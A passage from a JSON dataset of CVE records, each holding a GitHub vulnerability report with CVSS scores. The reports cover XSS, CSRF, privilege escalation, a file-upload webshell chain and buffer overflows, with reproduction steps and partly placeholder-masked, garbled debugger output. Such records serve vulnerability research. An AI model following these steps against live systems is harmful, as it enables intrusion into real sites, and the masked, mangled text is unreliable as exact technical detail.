        "description": "The function parameter FILETAG Directly trace to the FILETAG file. After analysis, this CMS handles the processing of each controller and operation through \u3010route\u3011, wherein the parameter route is the controller name and action name to be filled in in this GET request. FILETAG FILETAG A normal GET request would look like this URLTAG FILETAG And here the parameter \u3010route\u3011 is controllable, The value of the input parameter \u3010route\u3011 is processed as follows, The value of the parameter\u3010router\u3011is first split through APITAG as route=aaa/bbb, the aaa Is the controller name,bbb for the action of, It also makes conditional judgments about whether the controller and the action name exist, When the Controller name does not exist, it will directly output \"aaa Controller Controller does not exist NUMBERTAG as shown below FILETAG FILETAG This is for the parameter \u3010route\u3011, If the controller doesn't exist, The value of the input parameter \u3010route\u3011 is displayed directly, And the following values, without XSS filtering, Only the APITAG method is done here, and there is no XSS filtering function in this aspect FILETAG Because there is no filtering here, there is reflective XSS, which is tested as follows Because of the split for / here, the regular XSS payload cannot be taken from a bomb frame, so using the following XSS payload can make a bomb fram APITAG URLTAG FILETAG FILETAG The following test statement can also cause a pop up as normal route=admin/ APITAG FILETAG Solution\uff1a filter or encode special characters like this < > \" ' & % ... ... and filter some keyword like this script javascript ... ... or filter some label function which can run javascript like this onclick onerror onload ... ...",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.6,
        "impactScore": 6.0,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23719",
        "Issue_Url_old": "https://github.com/xujinliang/zibbs/issues/5",
        "Issue_Url_new": "https://github.com/xujinliang/zibbs/issues/5",
        "Repo_new": "xujinliang/zibbs",
        "Issue_Created_At": "2020-06-23T03:15:15Z",
        "description": "Background setting function APITAG XSS vulnerabilities. First log in to the background and go to the background APITAG the storage XSS vulnerabilities of chicken ribs\uff09 FILETAG Description here\uff08HTML syntax APITAG there is an XSS APITAG the parameter \u3010bbsmeta\u3011here by grabbing the APITAG in the source code PATHTAG code FILETAG This was filtered by APITAG and htmlspecialchar () Obviously when you insert the data into the database you will have a layer of filtering, and then you will continue to track the specific page output location of this parameter to the following PATHTAG code FILETAG When the page is output here, the following function is made for the parameter \u3010bbsmeta\u3011to handle htmlspecialchars_decode The storage XSS here results in the storage XSS due to the use APITAG function, So through the black box to verify Insert the following test statement in the background and click Update payload: APITAG alert(/xss/) APITAG FILETAG The XSS is then accessed directly to the foreground and executed successfully APITAG FILETAG FILETAG Solution\uff1a filter or encode special characters like this < > \" ' & % ... ... and filter some keyword like this script javascript ... ... or filter some label function which can run javascript like this onclick onerror onload ... ...",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.6,
        "impactScore": 6.0,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23721",
        "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/559",
        "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/559",
        "Repo_new": "daylightstudio/fuel-cms",
        "Issue_Created_At": "2020-06-23T08:53:30Z",
        "description": "bypass filter XSS vunerability. HI: The attacker bypasses the filter In this pages page! POC: APITAG APITAG APITAG and you can fix it!! thank you",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2020-23722",
        "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/560",
        "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/560",
        "Repo_new": "daylightstudio/fuel-cms",
        "Issue_Created_At": "2020-06-24T02:12:08Z",
        "description": "General users can modify the administrator password vulnerability. General users can modify the administrator password and account infomation vulnerability . for example: The account test NUMBERTAG can chanage the admin password!!! step NUMBERTAG log in test NUMBERTAG APITAG Step NUMBERTAG edit Any non administrator account\uff1a APITAG APITAG Step NUMBERTAG Save the chanage: APITAG Then Intercept the packets and chanage the \"id\" and \"__fuel_id__\" value NUMBERTAG APITAG APITAG Success : APITAG Step NUMBERTAG log in admin use new password \uff1a APITAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23754",
        "Issue_Url_old": "https://github.com/php-fusion/PHP-Fusion/issues/2315",
        "Issue_Url_new": "https://github.com/php-fusion/php-fusion/issues/2315",
        "Repo_new": "php-fusion/PHP-Fusion",
        "Issue_Created_At": "2020-05-11T10:50:27Z",
        "description": "Cross Site Script Vulnerability on APITAG in PHP Fusion NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG To Reproduce Steps to reproduce the behavior: Login into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click add Poll NUMBERTAG Insert Payload // \"> APITAG NUMBERTAG Save Poll: XSS alert Message! Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page Screenshots Link image APITAG URLTAG Desktop (please complete the following information): OS: Windows Browser: All",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.6,
        "impactScore": 6.0,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23765",
        "Issue_Url_old": "https://github.com/bludit/bludit/issues/1218",
        "Issue_Url_new": "https://github.com/bludit/bludit/issues/1218",
        "Repo_new": "bludit/bludit",
        "Issue_Created_At": "2020-06-27T17:44:40Z",
        "description": "Bludit NUMBERTAG Admin File Upload vulnerability. Describe your problem A file upload vulnerability was discovered in Bludit NUMBERTAG Hackers need administrator rights. Hacker can use a backup file to control the server. Steps to reproduce the problem NUMBERTAG Download the latest version of bludit from APITAG NUMBERTAG Using burpsuite when uploading logo in the background. Change picture content to PHP code APITAG FILETAG NUMBERTAG Enable backup APITAG and download a backup file, modify the extension of logo file directly in the zip file. If you unzip the backup to modify it, the upload will be blocked by WAF. FILETAG FILETAG FILETAG NUMBERTAG Access _ FILETAG to get the getshell FILETAG Vulnerability in PATHTAG ERRORTAG We can check the image content uploaded by users. Or just delete the backup module Bludit version NUMBERTAG PHP version APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-23766",
        "Issue_Url_old": "https://github.com/danpros/htmly/issues/412",
        "Issue_Url_new": "https://github.com/danpros/htmly/issues/412",
        "Repo_new": "danpros/htmly",
        "Issue_Created_At": "2020-07-02T21:10:33Z",
        "description": "Arbitrary file deletion vulnerability was found in NUMBERTAG ulnerability description Arbitrary file deletion vulnerability was found in APITAG need administrator rights and they can use any absolute directory to delete any file in the server. Steps to reproduce the problem Using APITAG source code to build the local environment. PHP NUMBERTAG Apache NUMBERTAG Windows NUMBERTAG FILETAG Enter the backup APITAG a backup and delete it. At the same time, use burpsuite to capture the package. FILETAG Enter the absolute path of the file you want to delete here. The relative path is OK FILETAG The file has been deleted. FILETAG I think there's something wrong with the code here. PATHTAG ERRORTAG It does not control the path entered by the user, nor does it detect whether the file belongs to backup",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 5.2,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2020-23768",
        "Issue_Url_old": "https://github.com/whiskey-jj/w2s2x2222.github.io/issues/1",
        "Issue_Url_new": "https://github.com/whiskey-jj/w2s2x2222.github.io/issues/1",
        "Repo_new": "whiskey-jj/w2s2x2222.github.io",
        "Issue_Created_At": "2020-07-23T05:37:41Z",
        "description": "PHPYUN NUMBERTAG UTF NUMBERTAG Beta has a store XSS vulnerability. Vulnerability description Phpyun is an efficient solution for recruitment and employment of talents and enterprises based on PHP and APITAG database. There is a storage type cross site scripting vulnerability in phpyun. An attacker can exploit the vulnerability to obtain administrator cookies. Recurrence of Vulnerability FILETAG Setting up the environment locally FILETAG Register as a regular user\uff0center APITAG and submit questions Fuzzing finds that most keywords and parentheses are filtered The structure is as follows APITAG APITAG APITAG FILETAG Enter the administrator page FILETAG FILETAG APITAG FILETAG Because the onbounce tag is used, it takes a long time to pop up the APITAG you can see that the code parsed successfully FILETAG This vulnerability has a CNVD number CNVD NUMBERTAG But it will be announced on the official website until NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23774",
        "Issue_Url_old": "https://github.com/zhonghaozhao/winmail/issues/2",
        "Issue_Url_new": "https://github.com/zhonghaozhao/winmail/issues/2",
        "Repo_new": "zhonghaozhao/winmail",
        "Issue_Created_At": "2020-06-28T02:42:40Z",
        "description": "Reflected XSS Vulnerability exists in the file of Winmail NUMBERTAG which can cause javascript code executed. Reflected XSS Vulnerability exists in the file of Winmail NUMBERTAG which can cause javascript code executed FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23776",
        "Issue_Url_old": "https://github.com/zhonghaozhao/winmail/issues/3",
        "Issue_Url_new": "https://github.com/zhonghaozhao/winmail/issues/3",
        "Repo_new": "zhonghaozhao/winmail",
        "Issue_Created_At": "2020-06-30T09:17:45Z",
        "description": "SSRF Vulnerability exists in the file of Winmail NUMBERTAG when HTTPS is on. SSRF Vulnerability exists in the file of Winmail NUMBERTAG when HTTPS is on The attacker can use this vulnerability to cause the server send the request to the specific url. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-23814",
        "Issue_Url_old": "https://github.com/xuxueli/xxl-job/issues/1866",
        "Issue_Url_new": "https://github.com/xuxueli/xxl-job/issues/1866",
        "Repo_new": "xuxueli/xxl-job",
        "Issue_Created_At": "2020-07-30T09:30:54Z",
        "description": "NUMBERTAG Stored XSS vulnerabilities. Locate the executor management function: FILETAG insert POC there has front end validation,By code audit, I find that the back end only has length APITAG be bypassed by Burp Intercept. FILETAG The code directly gets APITAG and manually entered parameters for front end display.No filtering or encoding APITAG storage XSS vulnerabilities. FILETAG The page automatically loads and triggers XSS every NUMBERTAG seconds. FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23836",
        "Issue_Url_old": "https://github.com/siamon123/warehouse-inventory-system/issues/55",
        "Issue_Url_new": "https://github.com/siamon123/warehouse-inventory-system/issues/55",
        "Repo_new": "siamon123/warehouse-inventory-system",
        "Issue_Created_At": "2020-08-10T05:11:52Z",
        "description": "CSRF Change Admin Password. Cross Site Request Forgery (CSRF) on APITAG page allows changing the admin password from a NUMBERTAG rd party site. For fix see: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23839",
        "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1330",
        "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1330",
        "Repo_new": "getsimplecms/getsimplecms",
        "Issue_Created_At": "2020-08-12T20:38:56Z",
        "description": "Reflected Cross Site Scripting (XSS) vulnerability in APITAG CMS NUMBERTAG in APITAG . Reflected Cross Site Scripting (XSS) vulnerability in APITAG CMS NUMBERTAG in APITAG login portal webpage allows remote attackers to execute APITAG code in the clients browser & harvest login credentials via client clicking a link, entering credentials, and submitting login form.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23849",
        "Issue_Url_old": "https://github.com/josdejong/jsoneditor/issues/1029",
        "Issue_Url_new": "https://github.com/josdejong/jsoneditor/issues/1029",
        "Repo_new": "josdejong/jsoneditor",
        "Issue_Created_At": "2020-07-01T03:41:10Z",
        "description": "In tree mode, there exists Stored XSS.. Insert a poc URLTAG FILETAG click the Drop down list box FILETAG click the input tag FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2020-23851",
        "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/27",
        "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/27",
        "Repo_new": "rockcarry/ffjpeg",
        "Issue_Created_At": "2020-07-02T10:41:13Z",
        "description": "ffjpeg \"jfif_decode\" function stack buffer overflow vulerability. ffjpeg \"jfif_decode\" function stack buffer overflow vulerability Description: There is a stack buffer overflow bug in jfif_decode(void ctxt, BMP pb) function at PATHTAG An attacker can exploit this bug to cause a Denial of Service APITAG by submitting a malicious jpeg image. The bug is caused by the dangerous pointer variable using as follow: x = ((mcui % mcuc) mcuw + h NUMBERTAG jfif >comp_info c].samp_factor_h / sfh_max; y = ((mcui / mcuc) mcuh NUMBERTAG jfif APITAG / sfv_max; idst = yuv_datbuf[c] + y yuv_stride[c] + x; the variable yuv_datbuf is an integer pointer array, but there is no security check before the using of yuv_datbuf (jfif.c: line NUMBERTAG We used APITAG instrumented in ffjpeg and triggered this bug, the output of asan as follow: APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG fff9fa0bfd8 at pc NUMBERTAG f NUMBERTAG f bp NUMBERTAG fff9f READ of size NUMBERTAG at NUMBERTAG fff9fa0bfd8 thread T NUMBERTAG f NUMBERTAG e in jfif_decode PATHTAG NUMBERTAG ed NUMBERTAG in main PATHTAG NUMBERTAG fcbfd NUMBERTAG eb NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG b NUMBERTAG in _start ( PATHTAG ) Address NUMBERTAG fff9fa0bfd8 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG f NUMBERTAG f in jfif_decode PATHTAG This frame has NUMBERTAG object(s NUMBERTAG ftab' (line NUMBERTAG dc' (line NUMBERTAG yuv_stride' (line NUMBERTAG yuv_datbuf' (line NUMBERTAG APITAG NUMBERTAG f NUMBERTAG f NUMBERTAG f2 f NUMBERTAG f2 f NUMBERTAG f2]f2 f2 f2 f NUMBERTAG f NUMBERTAG f NUMBERTAG f NUMBERTAG f3 f3 f3 f3 f3 f3 f3 f NUMBERTAG f NUMBERTAG f NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING We could clearly observe the stack overflow in jfif_decode function at NUMBERTAG f NUMBERTAG e, and the variable yuv_datbuf was overflowing. Lastly, we used GDB to debug this bug, the GDB outputs: Reading symbols from . APITAG gdb peda$ set args d APITAG gdb peda$ b NUMBERTAG f NUMBERTAG e Breakpoint NUMBERTAG at NUMBERTAG f NUMBERTAG e: file jfif.c, line NUMBERTAG gdb peda$ r Starting program: PATHTAG d APITAG APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG Program received signal SIGSEGV, Segmentation fault. [ registers ] RA NUMBERTAG RB NUMBERTAG fffffffe NUMBERTAG ffff6e NUMBERTAG APITAG : mov rax,QWORD PTR [rip NUMBERTAG ffff NUMBERTAG f NUMBERTAG APITAG ) RC NUMBERTAG ffffffffbff NUMBERTAG RD NUMBERTAG RSI NUMBERTAG b NUMBERTAG fede NUMBERTAG RDI NUMBERTAG fffffffdff NUMBERTAG b NUMBERTAG APITAG RBP NUMBERTAG fffffffe3d NUMBERTAG fffffffe4c NUMBERTAG ee NUMBERTAG APITAG : push r NUMBERTAG RSP NUMBERTAG fffffffded NUMBERTAG f NUMBERTAG f ( APITAG : call NUMBERTAG b6cc0 APITAG RIP NUMBERTAG ffffffffcd4b6cc0 R NUMBERTAG fede NUMBERTAG R NUMBERTAG ffffffffc NUMBERTAG R NUMBERTAG fffffffe NUMBERTAG f NUMBERTAG f NUMBERTAG R NUMBERTAG ffffffffc1a NUMBERTAG R NUMBERTAG R NUMBERTAG fb R NUMBERTAG R NUMBERTAG EFLAGS NUMBERTAG carry parity adjust zero SIGN trap INTERRUPT direction overflow) [ code ] Invalid $PC address NUMBERTAG ffffffffcd4b6cc0 [ stack NUMBERTAG fffffffded NUMBERTAG f NUMBERTAG f ( APITAG : call NUMBERTAG b6cc0 APITAG NUMBERTAG fffffffdee NUMBERTAG b NUMBERTAG ab NUMBERTAG fffffffdee NUMBERTAG e NUMBERTAG ftab NUMBERTAG dc NUMBERTAG yuv_stride NUMBERTAG yuv_datbuf NUMBERTAG du NUMBERTAG fffffffdef NUMBERTAG f NUMBERTAG APITAG : push rbp NUMBERTAG fffffffdef NUMBERTAG fffffffdf NUMBERTAG c NUMBERTAG c NUMBERTAG fffffffdf NUMBERTAG fffffffdf NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG ffffffffcd4b6cc0 in ?? () We ensured there is a stack overflow bugs, which will be used to finish a APITAG attack. You can reproduce this stack overflow vulnerability by the follow step: ffjpeg d APITAG URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-23852",
        "Issue_Url_old": "https://github.com/rockcarry/ffjpeg/issues/28",
        "Issue_Url_new": "https://github.com/rockcarry/ffjpeg/issues/28",
        "Repo_new": "rockcarry/ffjpeg",
        "Issue_Created_At": "2020-07-02T11:43:44Z",
        "description": "ffjpeg \"jfif_decode\" function heap overflow vulnerabilities. ffjpeg \"jfif_decode\" function heap overflow vulnerabilities Description: There are two heap overflow bugs in jfif_decode(void ctxt, BMP pb) function at PATHTAG line NUMBERTAG line NUMBERTAG An attacker can exploit this bug to cause a Denial of Service APITAG by submitting a malicious jpeg image. We finded the integer pointer array variable yuv_datbuf FILETAG Lastly, we used GDB to debug this bug, the GDB outputs: gdb peda$ b NUMBERTAG f2f NUMBERTAG Breakpoint NUMBERTAG at NUMBERTAG f2f NUMBERTAG gdb peda$ r Starting program: PATHTAG d hh Thread debugging using libthread_db enabled] Using host libthread_db library PATHTAG Program received signal SIGSEGV, Segmentation fault. [ registers ] RA NUMBERTAG RB NUMBERTAG fffffffdd NUMBERTAG a6e NUMBERTAG interceptor_free(void NUMBERTAG test r NUMBERTAG d,r NUMBERTAG d) RC NUMBERTAG ffffff NUMBERTAG RD NUMBERTAG c NUMBERTAG RSI NUMBERTAG ffffefcb NUMBERTAG RDI NUMBERTAG be RBP NUMBERTAG fffffffe3f NUMBERTAG fffffffe NUMBERTAG c NUMBERTAG APITAG : push r NUMBERTAG RSP NUMBERTAG fffffffda NUMBERTAG f2f0a ( APITAG : mov rax,QWORD PTR [rb NUMBERTAG RIP NUMBERTAG ffffffffcd4b4f NUMBERTAG R NUMBERTAG R NUMBERTAG R NUMBERTAG fffffffd1c NUMBERTAG a NUMBERTAG a1 APITAG test r NUMBERTAG d,r NUMBERTAG d) R NUMBERTAG R NUMBERTAG fffffffe NUMBERTAG dd NUMBERTAG dc NUMBERTAG R NUMBERTAG R NUMBERTAG fff7b NUMBERTAG f1f1f1f NUMBERTAG R NUMBERTAG dd NUMBERTAG dc NUMBERTAG EFLAGS NUMBERTAG carry parity adjust zero sign trap INTERRUPT direction overflow) [ code ] Invalid $PC address NUMBERTAG ffffffffcd4b4f NUMBERTAG stack NUMBERTAG fffffffda NUMBERTAG f2f0a ( APITAG : mov rax,QWORD PTR [rb NUMBERTAG fffffffda NUMBERTAG b NUMBERTAG ab NUMBERTAG fffffffda NUMBERTAG e NUMBERTAG ftab NUMBERTAG dc NUMBERTAG yuv_stride NUMBERTAG yuv_height NUMBERTAG yuv_datbuf NUMBERTAG du NUMBERTAG fffffffda NUMBERTAG f NUMBERTAG e0 ( APITAG : push rbp NUMBERTAG fffffffda NUMBERTAG a NUMBERTAG fffffffdaa NUMBERTAG c NUMBERTAG fffffffdaa NUMBERTAG fffffffdab NUMBERTAG Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG ffffffffcd4b4f NUMBERTAG in ?? () We ensured there is a heap overflow because of the dangerous using of the int pointer array variable yuv_datbuf This is the analysis of line NUMBERTAG and the analysis of line NUMBERTAG is similar, so we do not dump the detail analysis. You can reproduce this heap overflow vulnerability by the follow step: ffjpeg d APITAG URLTAG ffjpeg d APITAG URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-23861",
        "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/248",
        "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/248",
        "Repo_new": "libredwg/libredwg",
        "Issue_Created_At": "2020-07-18T12:19:50Z",
        "description": "APITAG \"read_system_page\" function heap overflow vulnerability. APITAG \"read_system_page\" function heap overflow vulnerability Description: There is a heap overflow function bug in \"read_system_page\" function at PATHTAG An attacker can exploit this bug to cause a Denial of Service APITAG by submitting a dwg file. This bug is caused by the following dangerous memcpy calling in read_system_page function: line NUMBERTAG if\u00a0(size_comp\u00a0 APITAG NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa NUMBERTAG fa fa NUMBERTAG fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc NUMBERTAG ABORTING Then, we used GDB to debug this bug, the GDB outputs: GDB [ registers ] RA NUMBERTAG ffff2c6a1e NUMBERTAG ffff6fed NUMBERTAG APITAG : dec DWORD PTR [rcx+rc NUMBERTAG RB NUMBERTAG f RC NUMBERTAG RD NUMBERTAG CODETAG ') R NUMBERTAG EFLAGS NUMBERTAG carry parity adjust zero sign trap INTERRUPT direction overflow) [ code NUMBERTAG ffff6fed NUMBERTAG APITAG : mov rdi,r NUMBERTAG ffff6fed NUMBERTAG APITAG : mov rsi,r NUMBERTAG ffff6fed NUMBERTAG APITAG : mov rdx,r NUMBERTAG ffff6fed NUMBERTAG a APITAG : call NUMBERTAG ffff6be NUMBERTAG APITAG NUMBERTAG ffff6fed NUMBERTAG f APITAG : mov rdi,r NUMBERTAG ffff6fed NUMBERTAG APITAG : call NUMBERTAG ffff6be NUMBERTAG e0 APITAG NUMBERTAG ffff6fed NUMBERTAG APITAG : jmp NUMBERTAG ffff6fed NUMBERTAG a APITAG NUMBERTAG ffff6fed NUMBERTAG APITAG : lea rdi,[rip NUMBERTAG d9a NUMBERTAG c NUMBERTAG ffff7d NUMBERTAG c Guessed arguments: arg NUMBERTAG arg NUMBERTAG arg NUMBERTAG CODETAG NUMBERTAG fffffffc NUMBERTAG ffffffffffffff NUMBERTAG fffffffc NUMBERTAG fffffffcc NUMBERTAG f [ ] Legend: code, data, rodata, value NUMBERTAG ffff6fed NUMBERTAG a NUMBERTAG memcpy (data, pedata, size_uncomp); gdb peda$ APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG at pc NUMBERTAG e7e NUMBERTAG bp NUMBERTAG fffffffc NUMBERTAG sp NUMBERTAG fffffffbbb0 READ of size NUMBERTAG at NUMBERTAG thread T0 APITAG process NUMBERTAG APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG process NUMBERTAG is executing new program: PATHTAG Error in re setting breakpoint NUMBERTAG No symbol table is loaded. Use the \"file\" command. Warning: Cannot insert breakpoint NUMBERTAG Cannot access memory at address NUMBERTAG c NUMBERTAG We ensured there is a heap overflow vulnerability because of the dangerous using of memcpy function, attacker can use this bug to finish a APITAG attack. You can reproduce this heap overflow vulnerability by the follow step: /dwg2dxf m b APITAG URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2020-23872",
        "Issue_Url_old": "https://github.com/kermitt2/pdf2xml/issues/10",
        "Issue_Url_new": "https://github.com/kermitt2/pdf2xml/issues/10",
        "Repo_new": "kermitt2/pdf2xml",
        "Issue_Created_At": "2020-07-06T01:52:41Z",
        "description": "NULL pointer dereference APITAG APITAG $ gdb ./pdf2xml (gdb) r NUMBERTAG NULL pointer dereference APITAG APITAG FILETAG FILETAG Program received signal SIGSEGV, Segmentation fault NUMBERTAG e NUMBERTAG b in APITAG (state NUMBERTAG a NUMBERTAG a0, this NUMBERTAG a NUMBERTAG at PATHTAG NUMBERTAG APITAG = APITAG (gdb) bt NUMBERTAG e NUMBERTAG b in APITAG (state NUMBERTAG a NUMBERTAG a0, this NUMBERTAG a NUMBERTAG at PATHTAG NUMBERTAG APITAG (this=<optimized out>, state NUMBERTAG a NUMBERTAG a0) at PATHTAG NUMBERTAG b in APITAG (this=this APITAG cmd=cmd APITAG APITAG APITAG at PATHTAG NUMBERTAG a4f in Gfx::go (this=this APITAG APITAG at PATHTAG NUMBERTAG e NUMBERTAG in Gfx::display (this=this APITAG APITAG APITAG at PATHTAG NUMBERTAG f NUMBERTAG in APITAG (this NUMBERTAG a NUMBERTAG f0, out NUMBERTAG eae0, out APITAG hDPI NUMBERTAG hDPI APITAG vDPI NUMBERTAG APITAG NUMBERTAG rotate=<optimized out>, rotate APITAG APITAG crop=crop APITAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG APITAG NUMBERTAG printing NUMBERTAG APITAG APITAG at PATHTAG NUMBERTAG af in Page::display (this=<optimized out>, out=out APITAG APITAG APITAG NUMBERTAG rotate=rotate APITAG APITAG crop=crop APITAG printing=printing APITAG APITAG APITAG at PATHTAG NUMBERTAG ffb in APITAG (this=this APITAG out NUMBERTAG out APITAG page=page APITAG hDPI NUMBERTAG hDPI APITAG APITAG NUMBERTAG DPI APITAG rotate NUMBERTAG rotate APITAG APITAG crop=crop APITAG printing NUMBERTAG APITAG APITAG at PATHTAG NUMBERTAG e in APITAG (this=this APITAG out=out APITAG APITAG APITAG APITAG APITAG rotate=rotate APITAG APITAG crop NUMBERTAG printing NUMBERTAG APITAG APITAG at PATHTAG NUMBERTAG d NUMBERTAG b in APITAG (this=this APITAG out=out APITAG APITAG APITAG APITAG APITAG APITAG rotate=rotate APITAG APITAG crop NUMBERTAG APITAG APITAG APITAG at PATHTAG NUMBERTAG in main (argc NUMBERTAG argv=<optimized out>) at PATHTAG (gdb NUMBERTAG i $rip NUMBERTAG e NUMBERTAG b APITAG NUMBERTAG mo NUMBERTAG fc(%rcx),%esi NUMBERTAG e2a1 APITAG NUMBERTAG mov %esi NUMBERTAG rb NUMBERTAG e2a7 APITAG NUMBERTAG callq NUMBERTAG fa0 APITAG NUMBERTAG e2ac APITAG NUMBERTAG mo NUMBERTAG rbx),%rdi NUMBERTAG e2b3 APITAG NUMBERTAG lea NUMBERTAG rdi),%r NUMBERTAG e2b7 APITAG NUMBERTAG mov %r NUMBERTAG rb NUMBERTAG e2be APITAG NUMBERTAG mo NUMBERTAG rdi),%r 